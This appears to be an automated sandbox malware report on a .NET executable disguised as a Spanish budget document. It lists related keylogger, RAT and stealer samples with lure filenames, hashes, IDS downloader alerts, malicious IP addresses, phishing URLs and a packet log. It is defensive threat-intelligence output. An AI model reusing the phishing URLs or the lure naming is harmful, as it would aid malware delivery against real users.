	Purchase Order 17025.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	http://archzine.net	Get hash	malicious	Unknown	Browse	188.114.96.3
UTMEMUS	Purchase Order 17025.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	rCommercialoffer_Technicaloffer_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	Factura Honorarios 2024-10.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	Fernissagerne.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	ADJUNTA.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	Quality stuff.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Gun Ici Cek Statu Listesi.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	PO Number- 4900003753.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Purchase Order 17025.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	PO 4500580954.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	rCommercialoffer_Technicaloffer_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Factura Honorarios 2024-10.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Fernissagerne.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	PG567777878-H677889978-6G89O9I4567778.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	INVOICE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	PO Number- 4900003753.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Purchase Order 17025.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	I43xo3KKfS.exe	Get hash	malicious	Stealc	Browse	149.154.167.220
	http://luckywinsweep.com/4tTAnN1826Wdfo84jjvakjqbux636KVMMHSLZEESXXFW54756LTNO308c9	Get hash	malicious	Phisher	Browse	149.154.167.220
	http://luckywinsweep.com/4HSvRF1826gInt84duwrkafbng636FPJGMZWGTSQLQDN54756JUOR308k9	Get hash	malicious	Phisher	Browse	149.154.167.220
	segura.vbs	Get hash	malicious	Remcos	Browse	149.154.167.220
	asegurar.vbs	Get hash	malicious	Remcos	Browse	149.154.167.220
	nOrden_de_Compra___0001245.vbs	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.220
	file.exe	Get hash	malicious	Stealc	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.682544901702346
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	PRESUPUESTO DE NOVIEMBRE...exe
File size:	815'104 bytes
MD5:	4cf66de9bfdf5bb65b4151f456db83df
SHA1:	8245fc47d7d1833882b90bbd1fe99d13b2335929
SHA256:	b07790927beaf1cc2d81cf76f0081c7c264c3133fe71437ca4bd26e220800d43
SHA512:	40a7727ee0786ab38fcedb5d0795e1524bba27e375fe0a756541e39412428b41a78674a546e492e388d3d0c69be75c405a9c4b1fde8fc9c21a08ddb702f8ce5d
SSDEEP:	24576:HwZRZ2F+K76bdAO5ZNWHX0xVgDJVqtjd:QN2gK7AZNW30xGixd
TLSH:	F905BED03A767B1ACEB54AB49529DD7483B52D687010FAE65EDC3BC735AC310AE08F42
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....#g..............0..f..........Z.... ........@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4c855a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67231B9C [Thu Oct 31 05:54:36 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
push ebx
add byte ptr [ecx+00h], bh
jnc 00007F5914E250D2h
je 00007F5914E250D2h
add byte ptr [ebp+00h], ch
add byte ptr [ecx+00h], al
arpl word ptr [eax], ax
je 00007F5914E250D2h
imul eax, dword ptr [eax], 00610076h
je 00007F5914E250D2h
outsd
add byte ptr [edx+00h], dh
add dword ptr [eax], eax
add byte ptr [eax], al
add al, byte ptr [eax]
add byte ptr [eax], al
add eax, dword ptr [eax]
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add eax, 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8506	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xca000	0x5ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xcc000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xc5188	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xc6598	0xc6600	09d38b5a75adb2b113f8a2a795896acd	False	0.8534590126811594	data	7.689072386621162	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xca000	0x5ac	0x600	5c000ee4b459d000b8a1a21a06a8e514	False	0.421875	data	4.084309782578386	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xcc000	0xc	0x200	1005019e23281330f7b77527569764fa	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xca090	0x31c	data			0.4321608040201005
RT_MANIFEST	0xca3bc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-31T10:35:17.072079+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49708	132.226.247.73	80	TCP
2024-10-31T10:35:18.353340+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49708	132.226.247.73	80	TCP
2024-10-31T10:35:19.059975+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.11	49780	188.114.97.3	443	TCP
2024-10-31T10:35:19.946064+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	49786	132.226.247.73	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 31, 2024 10:35:02.765862942 CET	49708	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:02.770754099 CET	80	49708	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:02.770982981 CET	49708	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:02.771111965 CET	49708	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:02.776087999 CET	80	49708	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:12.773505926 CET	80	49708	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:12.778711081 CET	49708	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:13.087740898 CET	49708	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:13.697173119 CET	49708	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:13.828908920 CET	80	49708	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:13.828936100 CET	80	49708	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:13.828979969 CET	49708	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:13.828979969 CET	49708	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:13.829416990 CET	80	49708	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:13.829467058 CET	49708	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:13.837055922 CET	80	49708	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:13.838092089 CET	80	49708	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:13.839642048 CET	80	49708	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:17.018172026 CET	80	49708	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:17.072078943 CET	49708	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:17.151957989 CET	49774	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:17.152031898 CET	443	49774	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:17.152170897 CET	49774	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:17.202997923 CET	49774	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:17.203028917 CET	443	49774	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:17.823951006 CET	443	49774	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:17.824074984 CET	49774	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:17.828984976 CET	49774	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:17.829009056 CET	443	49774	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:17.829369068 CET	443	49774	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:17.868972063 CET	49774	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:17.897666931 CET	49774	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:17.943341970 CET	443	49774	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:18.035412073 CET	443	49774	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:18.035516977 CET	443	49774	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:18.035604000 CET	49774	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:18.041712999 CET	49774	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:18.046241999 CET	49708	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:18.051173925 CET	80	49708	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:18.300370932 CET	80	49708	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:18.303126097 CET	49780	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:18.303169012 CET	443	49780	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:18.303354979 CET	49780	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:18.303622007 CET	49780	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:18.303637981 CET	443	49780	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:18.353339911 CET	49708	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:18.906969070 CET	443	49780	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:18.924645901 CET	49780	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:18.924669981 CET	443	49780	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:19.059994936 CET	443	49780	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:19.060098886 CET	443	49780	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:19.060187101 CET	49780	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:19.060724020 CET	49780	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:19.064070940 CET	49708	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:19.065198898 CET	49786	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:19.069962025 CET	80	49708	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:19.070034027 CET	49708	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:19.070161104 CET	80	49786	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:19.070234060 CET	49786	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:19.070328951 CET	49786	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:19.075282097 CET	80	49786	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:19.945801973 CET	80	49786	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:19.946063995 CET	49786	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:19.947233915 CET	49792	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:19.947282076 CET	443	49792	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:19.947354078 CET	49792	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:19.947592974 CET	49792	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:19.947613001 CET	443	49792	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:19.952889919 CET	80	49786	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:19.952946901 CET	49786	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:20.561954975 CET	443	49792	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:20.565519094 CET	49792	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:20.565546989 CET	443	49792	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:20.705152035 CET	443	49792	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:20.705245018 CET	443	49792	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:20.705426931 CET	49792	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:20.705816984 CET	49792	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:20.710153103 CET	49798	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:20.715337992 CET	80	49798	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:20.715410948 CET	49798	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:20.715481997 CET	49798	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:20.722007036 CET	80	49798	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:22.567306042 CET	80	49798	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:22.568870068 CET	49809	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:22.568928957 CET	443	49809	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:22.569010973 CET	49809	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:22.569281101 CET	49809	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:22.569293976 CET	443	49809	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:22.619052887 CET	49798	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:23.180325031 CET	443	49809	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:23.182105064 CET	49809	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:23.182120085 CET	443	49809	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:23.321930885 CET	443	49809	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:23.322040081 CET	443	49809	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:23.322084904 CET	49809	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:23.322591066 CET	49809	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:23.329277992 CET	49798	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:23.331554890 CET	49815	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:23.334665060 CET	80	49798	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:23.334742069 CET	49798	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:23.336342096 CET	80	49815	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:23.336435080 CET	49815	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:23.336566925 CET	49815	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:23.341356039 CET	80	49815	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:24.189604044 CET	80	49815	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:24.191029072 CET	49819	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:24.191050053 CET	443	49819	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:24.191114902 CET	49819	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:24.191359997 CET	49819	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:24.191370010 CET	443	49819	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:24.243940115 CET	49815	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:24.801070929 CET	443	49819	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:24.802839994 CET	49819	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:24.802880049 CET	443	49819	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:24.941660881 CET	443	49819	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:24.941858053 CET	443	49819	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:24.941939116 CET	49819	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:24.942356110 CET	49819	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:24.945422888 CET	49815	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:24.946532011 CET	49823	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:24.950973034 CET	80	49815	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:24.951045036 CET	49815	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:24.951581955 CET	80	49823	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:24.951653004 CET	49823	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:24.951780081 CET	49823	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:24.956608057 CET	80	49823	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:25.833621025 CET	80	49823	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:25.835006952 CET	49828	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:25.835047960 CET	443	49828	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:25.835118055 CET	49828	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:25.835381985 CET	49828	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:25.835391998 CET	443	49828	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:25.884637117 CET	49823	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:26.442466974 CET	443	49828	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:26.449470997 CET	49828	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:26.449492931 CET	443	49828	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:26.585117102 CET	443	49828	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:26.585226059 CET	443	49828	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:26.585335016 CET	49828	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:26.585944891 CET	49828	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:26.589154959 CET	49823	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:26.590646982 CET	49834	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:26.594641924 CET	80	49823	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:26.594750881 CET	49823	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:26.596002102 CET	80	49834	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:26.596107006 CET	49834	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:26.596254110 CET	49834	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:26.601059914 CET	80	49834	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:29.487379074 CET	80	49834	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:29.488847017 CET	49850	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:29.488892078 CET	443	49850	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:29.488986015 CET	49850	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:29.489233971 CET	49850	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:29.489252090 CET	443	49850	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:29.540864944 CET	49834	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:30.096824884 CET	443	49850	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:30.098556042 CET	49850	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:30.098586082 CET	443	49850	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:30.241353035 CET	443	49850	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:30.241480112 CET	443	49850	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:30.241631031 CET	49850	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:30.242188931 CET	49850	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:30.248794079 CET	49834	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:30.249855042 CET	49855	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:30.254390955 CET	80	49834	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:30.255352020 CET	80	49855	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:30.255542040 CET	49834	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:30.255584002 CET	49855	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:30.255770922 CET	49855	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:30.260598898 CET	80	49855	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:31.142432928 CET	80	49855	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:31.143851995 CET	49861	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:31.143894911 CET	443	49861	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:31.143996954 CET	49861	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:31.144232988 CET	49861	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:31.144247055 CET	443	49861	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:31.197222948 CET	49855	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:31.782111883 CET	443	49861	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:31.837723970 CET	49861	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:31.840131998 CET	49861	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:31.840142012 CET	443	49861	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:31.983668089 CET	443	49861	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:31.983769894 CET	443	49861	188.114.97.3	192.168.2.11
Oct 31, 2024 10:35:31.983823061 CET	49861	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:31.984245062 CET	49861	443	192.168.2.11	188.114.97.3
Oct 31, 2024 10:35:31.997438908 CET	49855	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:31.998209953 CET	49867	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:32.003717899 CET	80	49855	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:32.003731966 CET	80	49867	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:32.003783941 CET	49855	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:32.003844023 CET	49867	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:32.003972054 CET	49867	80	192.168.2.11	132.226.247.73
Oct 31, 2024 10:35:32.008954048 CET	80	49867	132.226.247.73	192.168.2.11
Oct 31, 2024 10:35:32.869249105 CET	80	49867	132.226.247.73	192.168.2.11
